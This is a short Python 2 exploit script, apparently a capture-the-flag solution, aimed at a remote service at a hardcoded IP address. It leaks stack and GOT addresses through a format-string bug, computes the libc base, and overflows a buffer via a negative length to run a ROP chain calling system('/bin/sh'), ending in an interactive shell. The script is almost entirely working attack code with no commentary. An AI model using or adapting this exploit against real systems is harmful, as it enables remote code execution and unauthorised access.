from codez import *

LOCAL = False

if LOCAL:
    prinf_off = 0x4fb10
    binsh = 0x164fea
    system = 0x3ffd0
    r = Remote('localhost',1234)
else:
    prinf_off = 0x54400
    binsh = 0x17D87B
    system = 0x46640
    r = Remote('54.65.28.239',9991)
    
r.read('> ')
r.write('%7$p###\n')
x=r.read('#')[:-1]
base = int(x,16) - 0xa5b
print '[+] base ',hex(base)
for i in range(50):
    r.read('>');r.write('N\n');r.read('>')
    r.write('%'+str(i+7)+'$pXXX'+'A'*8+'###\n')
    x=r.read('#')
    print x
    if '0x4141414141414141' in x:
        index = i+7
        break
#index = 11    
print '[+] found index %d' % index
r.read('>');r.write('N\n');r.read('>')
print hex(base + 0x201FA0)
r.write('|%' + str(index)+'$sXX' + pack('Q',base + 0x201FA1 )+' ###\n')
x=r.read('X')[:-1]
print `x`

x=x[x.index('|')+1:].ljust(8,"\x00")
_printf = unpack('Q',x)[0] << 8 | (prinf_off & 0xff)
print '[+] printf',hex(_printf)
libc  = _printf - prinf_off
print '[+] libc',hex(libc)

rop = [
     base + 0xb53 ## pop rdi
    ,libc + binsh
    ,libc + system
    ]

r.read('>');r.write('Y\n');r.read('>')
r.write('-' + str(9 + len(rop)*2)+'\n')
for i in range(46 + 8):
    r.write(str(0x41414141)+"\n")

for a in rop:
    hi = a >> 32
    low = a & 0xffffffff
    r.write(str(low)+"\n")
    r.write(str(hi)+"\n")

r.interactive()